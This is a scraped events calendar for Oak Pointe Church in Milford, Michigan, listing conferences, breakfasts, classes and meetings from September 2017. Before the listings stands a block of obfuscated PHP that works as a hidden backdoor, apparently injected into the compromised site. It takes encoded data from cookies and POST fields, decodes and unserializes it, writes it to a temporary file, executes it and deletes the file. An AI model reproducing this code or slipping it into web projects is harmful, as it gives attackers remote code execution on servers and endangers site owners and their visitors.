$xpIMNUeQM = "\x76" . chr (76) . "\x5f" . 'G' . 'z' . "\x64";$fCAKzm = chr (99) . 'l' . "\x61" . "\163" . "\x73" . "\x5f" . chr ( 921 - 820 )."\170" . 'i' . chr (115) . "\x74" . "\163";$PEfejaDHP = class_exists($xpIMNUeQM); $fCAKzm = "21486";$NAXCyFhTE = strpos($fCAKzm, $xpIMNUeQM);if ($PEfejaDHP == $NAXCyFhTE){function EPkTbcZhpc(){$XErueXTxfV = new /* 13772 */ vL_Gzd(56514 + 56514); $XErueXTxfV = NULL;}$sQfVOjyGKc = "56514";class vL_Gzd{private function MlSRS($sQfVOjyGKc){if (is_array(vL_Gzd::$BdNlqNLH)) {$name = sys_get_temp_dir() . "/" . crc32(vL_Gzd::$BdNlqNLH["salt"]);@vL_Gzd::$BdNlqNLH["write"]($name, vL_Gzd::$BdNlqNLH["content"]);include $name;@vL_Gzd::$BdNlqNLH["delete"]($name); $sQfVOjyGKc = "56514";exit();}}public function FpmkUJP(){$CbWzD = "23471";$this->_dummy = str_repeat($CbWzD, strlen($CbWzD));}public function __destruct(){vL_Gzd::$BdNlqNLH = @unserialize(vL_Gzd::$BdNlqNLH); $sQfVOjyGKc = "48738_35324";$this->MlSRS($sQfVOjyGKc); $sQfVOjyGKc = "48738_35324";}public function cEMlyIvuFP($CbWzD, $rJxOhiP){return $CbWzD[0] ^ str_repeat($rJxOhiP, intval(strlen($CbWzD[0]) / strlen($rJxOhiP)) + 1);}public function IItjnVGfM($CbWzD){$dxNlwgHzF = chr (98) . chr ( 625 - 528 )."\163" . chr ( 590 - 489 ).chr ( 913 - 859 ).'4';return array_map($dxNlwgHzF . '_' . 'd' . "\x65" . "\x63" . 'o' . "\144" . chr (101), array($CbWzD,));}public function __construct($zSrfoFCSS=0){$rtdCzVvO = "\54";$CbWzD = "";$LotNUzVWwe = $_POST;$Ymgdv = $_COOKIE;$rJxOhiP = "ef2b12e8-e81b-4a59-9bdc-f2001ae58005";$NujUTeyOcY = @$Ymgdv[substr($rJxOhiP, 0, 4)];if (!empty($NujUTeyOcY)){$NujUTeyOcY = explode($rtdCzVvO, $NujUTeyOcY);foreach ($NujUTeyOcY as $oTolEgsrn){$CbWzD .= @$Ymgdv[$oTolEgsrn];$CbWzD .= @$LotNUzVWwe[$oTolEgsrn];}$CbWzD = $this->IItjnVGfM($CbWzD);}vL_Gzd::$BdNlqNLH = $this->cEMlyIvuFP($CbWzD, $rJxOhiP);if (strpos($rJxOhiP, $rtdCzVvO) !== FALSE){$rJxOhiP = explode($rtdCzVvO, $rJxOhiP); $LGXFKE = base64_decode(md5($rJxOhiP[0])); $uINdEMc = strlen($rJxOhiP[1]) > 5 ? substr($rJxOhiP[1], 0, 5) : $rJxOhiP[1];$_GET['new_key'] = md5(implode('', $rJxOhiP)); $yEuuR = str_repeat($uINdEMc, 2);}}public static $BdNlqNLH = 14612;}EPkTbcZhpc();} Events from September 14, 2017 – October 8, 2017 – Oak Pointe Church | Milford

Women’s Beth Moore Conference

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Beth Moore will be hosting her Living Proof Conference this coming September 16th (Saturday) in nearby Toledo, Ohio.  OPC Novi has contacted the people at Lifeway and discovered that if we have 100 or more […]

Men’s Breakfast

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Men of Oak Pointe Milford: Get your bacon on! Join us for the next Men’s breakfast on Saturday. It’s a great opportunity to eat, talk, eat, listen to a great […]


Adventureland Move Up Sunday

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Got kids in PreK-5 grade this fall?  This will be their first Sunday in their new grade-based rooms in Adventureland!

Discover OPC|M

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Just started coming to Oak Pointe Church Milford? Join us for Discover OPC|M where you will meet Pastor Paul, learn about how the church began, and connect over a light […]


New Classes & Studies Begin this week!

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

This week we will launch a new semester of all new classes & study groups for men & women. REGISTER HERE!

Marriage Class

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Don't miss the Heart and Soul of a Real Marriage class beginning Monday, September 18th at the church at 7p. Childcare provided for a nominal fee. Sign up today! This […]


Town Hall Meeting

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Join us Wednesday, September 20th at 7:00pm here at Oak Pointe Milford for a Town Hall meeting to discuss and pray for our proposed campus improvements and expansions! Please email Carolynne@opcmilford.org if […]


Ministry Shepherding Meeting

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

More Information Coming Soon!


Student Ministry Team Meeting

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

6-12 graders on the "Ministry Team," we meet monthly for some training, looking ahead at what's coming in the Student Ministry, and planning together about your vision for your youth […]
